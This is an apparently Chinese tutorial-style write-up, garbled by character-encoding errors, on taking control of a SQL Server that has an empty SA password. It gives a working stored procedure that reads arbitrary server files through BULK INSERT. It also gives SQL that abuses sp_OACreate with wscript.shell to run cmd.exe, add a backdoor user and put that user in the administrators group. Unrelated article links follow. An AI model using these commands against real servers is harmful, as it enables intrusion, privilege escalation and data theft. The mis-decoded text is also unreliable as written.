- 相關(guān)推薦
利用存儲(chǔ)過(guò)程控制SA口令為空的SQLServer服務(wù)器的方法
前幾天朋友找我,讓我?guī)兔y(cè)試一下他們的服務(wù)器,經(jīng)過(guò)掃描后發(fā)現(xiàn)SQLServer的SA為空,決定利用這個(gè)漏洞做滲透測(cè)試。經(jīng)過(guò)測(cè)試發(fā)現(xiàn)存儲(chǔ)過(guò)程 Xp_cmdshell以及讀取注冊(cè)表系列的存儲(chǔ)過(guò)程都被刪除了,并且Xplog70.dll也被刪除,所以無(wú)法執(zhí)行CMD命令和克隆管理員帳號(hào)了,看樣子是經(jīng)過(guò)安全配置的,這種情況據(jù)我當(dāng)時(shí)掌握的知識(shí)是沒(méi)辦法入侵的。以前也遇到過(guò)類(lèi)似的機(jī)器,所以決定利用幾天的時(shí)間解決這個(gè)問(wèn)題。經(jīng)過(guò)兩天的查閱資料和測(cè)試,實(shí)現(xiàn)了不需要使用任何SQLServer自帶的存儲(chǔ)過(guò)程就可以從目標(biāo)機(jī)上得到txt、asp等類(lèi)型文件的內(nèi)容(前提是知道SA 密碼或者SA密碼為空),實(shí)現(xiàn)過(guò)程就是自己建立一個(gè)臨時(shí)表,然后將文件讀到表中,再用SELECT語(yǔ)句得到返回值,即文件的內(nèi)容。我們可以在查詢分析器里先寫(xiě)入一個(gè)存儲(chǔ)過(guò)程,然后執(zhí)行,在需要的時(shí)候只要調(diào)用該存儲(chǔ)過(guò)程即可:
Create proc sp_readTextFile @filename sysname
as
begin
set nocount on
Create table #tempfile (line varchar(8000))
exec ('bulk insert #tempfile from "' + @filename + '"')
select * from #tempfile
drop table #tempfile
End
go
這樣我們只要執(zhí)行類(lèi)似下面的語(yǔ)句就可以得到指定路徑下文件的內(nèi)容:
exec sp_readTextFile 'c:\aaa.asp'
實(shí)現(xiàn)這個(gè)功能后,本打算通過(guò)讀取朋友服務(wù)器上網(wǎng)站的asp代碼,做進(jìn)一步的入侵,可是后來(lái)發(fā)現(xiàn),因?yàn)椴恢谰W(wǎng)站asp文件的絕對(duì)路徑,所以這個(gè)功能根本用不上,只好作罷,另找其他方法。在這之后的幾天時(shí)間里,我想到了使用安全文章經(jīng)常提到OLE相關(guān)的一系列存儲(chǔ)過(guò)程,這一系列的存儲(chǔ)過(guò)程同 Xp_cmdshell以及讀取注冊(cè)表系列的存儲(chǔ)過(guò)程一樣危險(xiǎn),但是其使用方法不象那些存儲(chǔ)過(guò)程在網(wǎng)絡(luò)上和書(shū)上介紹的那樣多,這系列的存儲(chǔ)過(guò)程有 sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod, sp_OASetProperty,sp_OAStop,下面我講一下通過(guò)查閱資料得到的使用方法:
打開(kāi)查詢分析器,然后使用SA與目標(biāo)機(jī)連接上,在查詢分析器里執(zhí)行:
DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user
ceshi 1 /add'--
這樣對(duì)方系統(tǒng)增加了一個(gè)用戶名為ceshi,密碼為1的用戶,再執(zhí)行:
DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup
administrators ceshi /add '--
用戶ceshi,被加入管理員組。
總結(jié):通過(guò)這次滲透測(cè)試,又學(xué)到了一種利用存儲(chǔ)過(guò)程控制SA為空的SQLServer服務(wù)器的方法。
【利用存儲(chǔ)過(guò)程控制SA口令為空的SQLServer服務(wù)器的方法】相關(guān)文章:
以過(guò)程為話題的作文08-17
以過(guò)程為話題的作文11-07
利用口令法提高學(xué)生隊(duì)列訓(xùn)練的興趣08-21
基于伯努利大數(shù)定律的云存儲(chǔ)數(shù)據(jù)方法研究08-18
以享受過(guò)程為話題作文02-25
以過(guò)程為話題的作文2篇12-24
控制槍支的方法 The Way to Control Gun05-11
過(guò)程裝備與控制工程專(zhuān)業(yè)學(xué)生求職信05-28
利用PXE批量克隆機(jī)器的一些方法08-18